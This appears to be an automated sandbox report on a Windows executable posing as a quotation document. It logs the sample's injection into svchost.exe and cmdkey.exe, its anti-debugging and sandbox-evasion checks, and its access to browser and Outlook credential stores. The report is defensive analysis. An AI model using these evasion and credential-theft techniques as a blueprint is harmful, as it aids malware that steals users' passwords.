              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Code function: 0_2_006A37B5 GetLastError,FormatMessageW
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Code function: 0_2_006910BF AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Code function: 0_2_006916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Code function: 0_2_006A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Code function: 0_2_006BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Code function: 0_2_006A648E CoInitialize,CoCreateInstance,CoUninitialize
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Code function: 0_2_006342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; File created: C:\Users\user\AppData\Local\Temp\scroll
              Source: QUOTATION#070125-ELITE MARINE .exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exe; File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: cmdkey.exe, 00000003.00000003.11918930615.0000000008080000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15249022133.000000000808A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
              Source: cmdkey.exe, 00000003.00000003.11916406824.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11911162884.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11916406824.00000000031D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.00000000031F5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: cmdkey.exe, 00000003.00000002.15244350653.0000000003255000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11922384899.00000000080E6000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.dr; Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: QUOTATION#070125-ELITE MARINE .exe; ReversingLabs: Detection: 60%
              Source: unknown; Process created: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
              Source: C:\Windows\SysWOW64\cmdkey.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: version.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: edgegdi.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe; Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: edgegdi.dll
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; Section loaded: mswsock.dll
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; Section loaded: dnsapi.dll
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; Section loaded: iphlpapi.dll
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; Section loaded: fwpuclnt.dll
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe; Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: version.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: mlang.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\cmdkey.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
              Source: C:\Windows\SysWOW64\cmdkey.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: QUOTATION#070125-ELITE MARINE .exe; Static file information: File size 1749504 > 1048576
              Source: QUOTATION#070125-ELITE MARINE .exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: QUOTATION#070125-ELITE MARINE .exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: QUOTATION#070125-ELITE MARINE .exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: QUOTATION#070125-ELITE MARINE .exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: QUOTATION#070125-ELITE MARINE .exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: QUOTATION#070125-ELITE MARINE .exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: QUOTATION#070125-ELITE MARINE .exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: cmdkey.pdbGCTL source: svchost.exe, 00000001.00000003.11702724830.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11734330614.0000000003200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11152091635.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11648789785.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11646044895.0000000003500000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.000000000384D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11733827034.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11737430340.0000000003572000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.0000000003720000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11152091635.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11648789785.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11646044895.0000000003500000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000003.00000002.15246648295.000000000384D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11733827034.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11737430340.0000000003572000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.0000000003720000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: cmdkey.pdb source: svchost.exe, 00000001.00000003.11702724830.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11734330614.0000000003200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: RAVCpl64.exe, 00000002.00000002.16214552888.00000000066DC000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000003D4C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.000000000291C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: svchost.pdbUGP source: RAVCpl64.exe, 00000002.00000002.16214552888.00000000066DC000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000003D4C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.000000000291C000.00000004.80000000.00040000.00000000.sdmp
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: QUOTATION#070125-ELITE MARINE .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006342DE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00650A76 push ecx; ret 0_2_00650A89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040505A push cs; iretd 1_2_00405061
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040189C push ss; iretd 1_2_004018A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004180AB push esp; ret 1_2_004180AC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040514D push ds; iretd 1_2_00405171
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411A63 push ebp; retf 1_2_00411A6D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407270 push 0000006Ch; iretd 1_2_0040727B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418274 push esp; retf 1_2_00418281
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403340 push eax; ret 1_2_00403342
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004174CC push esp; retf 1_2_004174D6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004045D4 push esp; iretd 1_2_004045DD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413663 push cs; ret 1_2_00413695
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417630 push edi; ret 1_2_0041763A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D6A4 push ds; ret 1_2_0040D6B6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404F63 push esi; iretd 1_2_00404F66
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039021AD pushad ; retf 0004h1_2_0390223F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039308CD push ecx; mov dword ptr [esp], ecx1_2_039308D6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039097A1 push es; iretd 1_2_039097A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C852B4 push edi; ret 1_2_03C852B7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C9124E push ebp; ret 1_2_03C91250
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C95042 push eax; ret 1_2_03C95044
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8753D push edx; iretd 1_2_03C8753E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C854A5 push esp; iretd 1_2_03C854C2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86404 push ecx; ret 1_2_03C86405
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85B8D push FFFFFFC9h; iretd 1_2_03C85B96
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C84BA2 push esp; iretd 1_2_03C84BA3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8C9AE push eax; retf 1_2_03C8C9B9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C848F7 pushad ; iretd 1_2_03C84902
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C84F53 push ss; retf 1_2_03C84FCF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8CDEC push esi; retf 1_2_03C8CDF9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85D9C push ecx; iretd 1_2_03C85D9D
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0064F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0064F98E
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_006C1C41
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97010
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeAPI/Special instruction interceptor: Address: 106CD44
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EED144
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EF0594
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EEFF74
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EED6C4
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EED864
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCB3EED004
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED144
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EF0594
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED764
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED324
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED364
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED004
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EEFF74
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED6C4
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED864
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFCB3EED604
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397088E rdtsc 1_2_0397088E
              Source: C:\Windows\SysWOW64\cmdkey.exeWindow / User API: threadDelayed 9166
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeAPI coverage: 3.5 %
              Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.9 %
              Source: C:\Windows\SysWOW64\cmdkey.exeAPI coverage: 1.1 %
              Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1416Thread sleep count: 121 > 30
              Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1416Thread sleep time: -242000s >= -30000s
              Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1416Thread sleep count: 9166 > 30
              Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1416Thread sleep time: -18332000s >= -30000s
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0066C2A2 FindFirstFileExW,0_2_0066C2A2
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A68EE FindFirstFileW,FindClose,0_2_006A68EE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_006A698F
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0069D076
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0069D3A9
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006A9642
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006A979D
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_006A9B2B
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0069DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0069DBBE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_006A5C97
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006342DE
              Source: cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
              Source: RAVCpl64.exe, 00000002.00000002.16199147921.000000000059E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.12028192227.0000025D82937000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\cmdkey.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397088E rdtsc 1_2_0397088E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417AD3 LdrLoadDll,1_2_00417AD3
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006AEAA2 BlockInput,0_2_006AEAA2
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00662622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00662622
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_006342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006342DE
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_00654CE8 mov eax, dword ptr fs:[00000030h]0_2_00654CE8
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0106CFB0 mov eax, dword ptr fs:[00000030h]0_2_0106CFB0
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0106D010 mov eax, dword ptr fs:[00000030h]0_2_0106D010
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exeCode function: 0_2_0106B9A0 mov eax, dword ptr fs:[00000030h]0_2_0106B9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A390 mov eax, dword ptr fs:[00000030h]1_2_0395A390
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43BA mov eax, dword ptr fs:[00000030h]1_2_039D43BA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC3B0 mov eax, dword ptr fs:[00000030h]1_2_039AC3B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039643D0 mov ecx, dword ptr fs:[00000030h]1_2_039643D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE3DD mov eax, dword ptr fs:[00000030h]1_2_039BE3DD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B43D5 mov eax, dword ptr fs:[00000030h]1_2_039B43D5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E3C0 mov eax, dword ptr fs:[00000030h]1_2_0392E3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C3C7 mov eax, dword ptr fs:[00000030h]1_2_0392C3C7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039363CB mov eax, dword ptr fs:[00000030h]1_2_039363CB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E310 mov eax, dword ptr fs:[00000030h]1_2_0394E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396631F mov eax, dword ptr fs:[00000030h]1_2_0396631F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D630E mov eax, dword ptr fs:[00000030h]1_2_039D630E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968322 mov eax, dword ptr fs:[00000030h]1_2_03968322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E328 mov eax, dword ptr fs:[00000030h]1_2_0392E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A350 mov eax, dword ptr fs:[00000030h]1_2_0396A350
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928347 mov eax, dword ptr fs:[00000030h]1_2_03928347
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE372 mov eax, dword ptr fs:[00000030h]1_2_039AE372
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0371 mov eax, dword ptr fs:[00000030h]1_2_039B0371
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395237A mov eax, dword ptr fs:[00000030h]1_2_0395237A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E363 mov eax, dword ptr fs:[00000030h]1_2_0396E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE289 mov eax, dword ptr fs:[00000030h]1_2_039AE289
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C2B0 mov ecx, dword ptr fs:[00000030h]1_2_0392C2B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039542AF mov eax, dword ptr fs:[00000030h]1_2_039542AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402F9 mov eax, dword ptr fs:[00000030h]1_2_039402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2E0 mov eax, dword ptr fs:[00000030h]1_2_0393A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039382E0 mov eax, dword ptr fs:[00000030h]1_2_039382E0
